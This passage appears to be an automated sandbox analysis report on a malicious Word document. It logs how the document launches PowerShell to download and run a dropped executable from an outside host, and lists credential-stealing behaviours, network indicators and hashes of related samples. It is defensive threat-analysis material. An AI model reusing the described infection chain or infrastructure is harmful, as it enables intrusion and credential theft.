Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 78.137.164.80 80

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of WindowsShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxkh.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxkh.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxkh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxkh.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 50178 Sample: BjgOdvod71.000 Startdate: 13/03/2018 Architecture: WINDOWS Score: 100 33 Multi AV Scanner detection for submitted file 2->33 35 .NET source code contains very large array initializations 2->35 37 Suspicious powershell command line found 2->37 39 7 other signatures 2->39 8 WINWORD.EXE 304 23 2->8         started        process3 signatures4 57 Suspicious powershell command line found 8->57 59 Tries to download and execute files (via powershell) 8->59 61 Document exploit detected (process start blacklist hit) 8->61 11 powershell.exe 12 7 8->11         started        process5 dnsIp6 27 peadarking.com 78.137.164.80, 49170, 49172, 49173 DIGIWEB-ASIE Ireland 11->27 29 checkip.dyndns.org 11->29 31 8.8.8.8, 52046, 53, 60052 GOOGLE-GoogleIncUS United States 11->31 23 C:\Users\user\AppData\Roaming\wxkh.exe, PE32 11->23 dropped 63 System process connects to network (likely due to code injection or exploit) 11->63 65 Powershell connects to network 11->65 67 Powershell drops PE file 11->67 16 wxkh.exe 1 18 11->16         started        file7 signatures8 process9 signatures10 41 Multi AV Scanner detection for dropped file 16->41 43 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->43 45 Modifies the context of a thread in another process (thread injection) 16->45 47 Injects a PE file into a foreign processes 16->47 19 wxkh.exe 12 15 16->19         started        process11 dnsIp12 25 checkip.dyndns.org 216.146.43.70, 49171, 80 DYNDNS-DynamicNetworkServicesIncUS United States 19->25 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->49 51 Tries to steal Instant Messenger accounts or passwords 19->51 53 Tries to steal Mail credentials (via file access) 19->53 55 3 other signatures 19->55 signatures13

Simulations

Behavior and APIs

TimeTypeDescription
22:29:30API Interceptor5x Sleep call for process: WINWORD.EXE modified
22:29:34API Interceptor4x Sleep call for process: powershell.exe modified
22:29:45API Interceptor12x Sleep call for process: wxkh.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
BjgOdvod7.doc39%virustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\wxkh.exe24%virustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
peadarking.com0%virustotalBrowse
checkip.dyndns.org0%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
216.146.43.70SCAN7383873748 PDF.exe729af9844c36afd1cb438e23cf4524889bbd5437ea6dc1368fd16007aceb2089maliciousBrowse
  • checkip.dyndns.org/
PO.exe7a5552d1ff6d3c08e9a83455b71dbf546e78e2da29086a38a8a75e3a58a06002maliciousBrowse
  • checkip.dyndns.org/
PAYMENT INSTRUCTION PDF.exeb701f0a5714aba0c273af924a7ce5288af2a35143a3741ba99f7f8bb2f600369maliciousBrowse
  • checkip.dyndns.org/
40BLS1267_R0 PROFORMA INVOICE.exea649d29c533e965816469bc3c7084a6c3c967c9ce05373bbc90ddcddc0f6bef8maliciousBrowse
  • checkip.dyndns.org/
37Statment of account.exea4e7978ec730c544edb60f73745059524b03e9255717d760284e120d576ca97emaliciousBrowse
  • checkip.dyndns.org/
31Tender Copy_00901.exefeb46559f7e617f94e84473d292236e862270ec8f95f4666d156370465646059maliciousBrowse
  • checkip.dyndns.org/
38QUOTATION LIST HF20180122,,................................. PDF.exe035eb2826b207cca90452cd8a08b83a1cb9dd1ae4e5e71e04e120d5db6a91dd0maliciousBrowse
  • checkip.dyndns.org/
65Details of Account Misuse.exe40bf455b1774d2e9c95f85ac97977fc762b853f8a25285b837f7929d700f2f1fmaliciousBrowse
  • checkip.dyndns.org/
BANK TRANSFER COPY TT05022018.exec2a0e879977178e8dc561fc273d5fdb0540aaa09855a299415cae8e2c379f418maliciousBrowse
  • checkip.dyndns.org/
CHIKA-P.exe4deed296423e28244b1e085827a6e4f945081a624b63072e825a1239563c7809maliciousBrowse
  • checkip.dyndns.org/
20Fax Email.exe8b9f2a46b9fef7d9ba901e48ade0203359d0512f62dda450d4347331b23b7bafmaliciousBrowse
  • checkip.dyndns.org/
PA78642items.doc00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02maliciousBrowse
  • checkip.dyndns.org/
27DHLSOA03218.exe8c675776d7fd07a18598591320ea81d04c21981f4ee71f72b29fe7b26ab4762amaliciousBrowse
  • checkip.dyndns.org/
16Awb Receipt.exe9fe9b640c0ec8f1f43ac23a6765e45cf8f107fa4f7b2c8d892ccc09adc0790b0maliciousBrowse
  • checkip.dyndns.org/
29paynet00012324.exece39d99c0702a1c3247d57c07999a6bd1180239020ef78685008ed4295f2e491maliciousBrowse
  • checkip.dyndns.org/
41Packaging list & CI.exedfdd62e054bd719dce9fbd5aa3d6e23e60f74cc56f8c0467bdea4cc79c289fe7maliciousBrowse
  • checkip.dyndns.org/
40Invoice-EB377623.pdf.exe3cc5bd682a7273f8b7ad47937401040fb5088ffae1e8527ec3ea34846e1cbaabmaliciousBrowse
  • checkip.dyndns.org/
69File 1.exe07e874e05345849d0ddd6e79f754a56fa8fb5aec92a2c925ced9204b5ed7d173maliciousBrowse
  • checkip.dyndns.org/
Techn O Earts B.V.exe788c472ccd08f7d96cb611e664bb054053461d67beaefe50aa346ab9f17dd744maliciousBrowse
  • checkip.dyndns.org/
shipping docs...exe33db3ec3135f6d1dc80da4a76dda73628e37df4444b78b2757d77b0c6831ca53maliciousBrowse
  • checkip.dyndns.org/

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
checkip.dyndns.orginvoice.exe73c77f86b2a989f4f97a401f6255cc91f4763a35e8e1193719c6edf90e92bcc5maliciousBrowse
  • 216.146.38.70
PO.exe7a5552d1ff6d3c08e9a83455b71dbf546e78e2da29086a38a8a75e3a58a06002maliciousBrowse
  • 216.146.43.70
Swift Copy.exe7ab2416e90532fa1f36d936f8297bc5281ddc3e233e899bf305815565f2e1f68maliciousBrowse
  • 216.146.38.70
81PI-69932INV.Order.exe1b8fff3e901f8168aeb39209daa590f1b6540304d3ef0b52b882f9090b6faf43maliciousBrowse
  • 216.146.38.70
8Purchase Order_pdf.exec507602ea628cf7114397234fcd503713bfd53e4665d68fbcf7dc0d5997675f5maliciousBrowse
  • 91.198.22.70
67Invoice details_pdf.exe17f360d3dd353fe906a7961dd69de30d9d274e47d63a7a9e8b1dddc0d3f4db4cmaliciousBrowse
  • 91.198.22.70
58Order-Quotation.exeaaa2a75497914c77c42a98f1607de2b9b0abbc82db345d699cb751781f5b7717maliciousBrowse
  • 216.146.43.71
77inquiry.exe2af049dcfa207c65e7bf025982de02fc4985b13b893ccdd0966427688b43cb92maliciousBrowse
  • 91.198.22.70
40BLS1267_R0 PROFORMA INVOICE.exea649d29c533e965816469bc3c7084a6c3c967c9ce05373bbc90ddcddc0f6bef8maliciousBrowse
  • 216.146.43.70

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
DYNDNS-DynamicNetworkServicesIncUS81PI-69932INV.Order.exe1b8fff3e901f8168aeb39209daa590f1b6540304d3ef0b52b882f9090b6faf43maliciousBrowse
  • 216.146.38.70
8Purchase Order_pdf.exec507602ea628cf7114397234fcd503713bfd53e4665d68fbcf7dc0d5997675f5maliciousBrowse
  • 91.198.22.70
67Invoice details_pdf.exe17f360d3dd353fe906a7961dd69de30d9d274e47d63a7a9e8b1dddc0d3f4db4cmaliciousBrowse
  • 91.198.22.70
58Order-Quotation.exeaaa2a75497914c77c42a98f1607de2b9b0abbc82db345d699cb751781f5b7717maliciousBrowse
  • 216.146.43.71
77inquiry.exe2af049dcfa207c65e7bf025982de02fc4985b13b893ccdd0966427688b43cb92maliciousBrowse
  • 91.198.22.70
40BLS1267_R0 PROFORMA INVOICE.exea649d29c533e965816469bc3c7084a6c3c967c9ce05373bbc90ddcddc0f6bef8maliciousBrowse
  • 216.146.43.70
53Invoice$67,22373.exe0c6668944c0a61c84bc50f513e2e9797627d37fa193d61b3f9435e1b81f941ddmaliciousBrowse
  • 91.198.22.70
19Account Misuse Mails.exed3977205c6ee79db494b6478ae33a727168a20f4e43bd3994c7c2212ed177a9emaliciousBrowse
  • 216.146.43.71
37Statment of account.exea4e7978ec730c544edb60f73745059524b03e9255717d760284e120d576ca97emaliciousBrowse
  • 216.146.43.70
62Specification, Drawings and Product list.execb0f7ce4bedb89b2f702f35874e6ea0d9d90080a9a3d771cf65b30d4830cebaamaliciousBrowse
  • 91.198.22.70
7Order Status.exe06898960afad79237b55f1fc3dfec8ab7b7d94092fe77887591e1fe6014fb410maliciousBrowse
  • 216.146.38.70
BinderFile.exe25e9f71272ad2afd08692d6f248bb18ca6f73a6f342b65b1f5f3b1d9e91f9cd4maliciousBrowse
  • 216.146.43.71
53Complaint E-mail.exe4fc04ae96b5a45acb1d345eae453b7d792e9d2464aea9b20abbc9023739f2ee1maliciousBrowse
  • 216.146.38.70
34Outstanding Report.exe0c479ac451401ec9db154e75933bd75ecf992fa2eeda268cc8eb87e30b7667f1maliciousBrowse
  • 216.146.43.71
51January 2018-Proforma Invoice..exee1db659288eae8bebc99a64c1a5a215fb8e1087b77867215ba3dbb5216d679a5maliciousBrowse
  • 91.198.22.70
23Payment copy.exedcdcdfb239595ca4c4c712fff48d18608a345b9e8c89511d6dc50a60e5904199maliciousBrowse
  • 216.146.38.70
31Tender Copy_00901.exefeb46559f7e617f94e84473d292236e862270ec8f95f4666d156370465646059maliciousBrowse
  • 216.146.43.70
69Quotation00687USA.exe4607a917a433b4bbb0be4eda47cc56b8cabf7515c851b4a19fdd5de9c690f928maliciousBrowse
  • 216.146.38.70
38QUOTATION LIST HF20180122,,................................. PDF.exe035eb2826b207cca90452cd8a08b83a1cb9dd1ae4e5e71e04e120d5db6a91dd0maliciousBrowse
  • 216.146.43.70
65Details of Account Misuse.exe40bf455b1774d2e9c95f85ac97977fc762b853f8a25285b837f7929d700f2f1fmaliciousBrowse
  • 216.146.43.70

Dropped Files

No context

Screenshot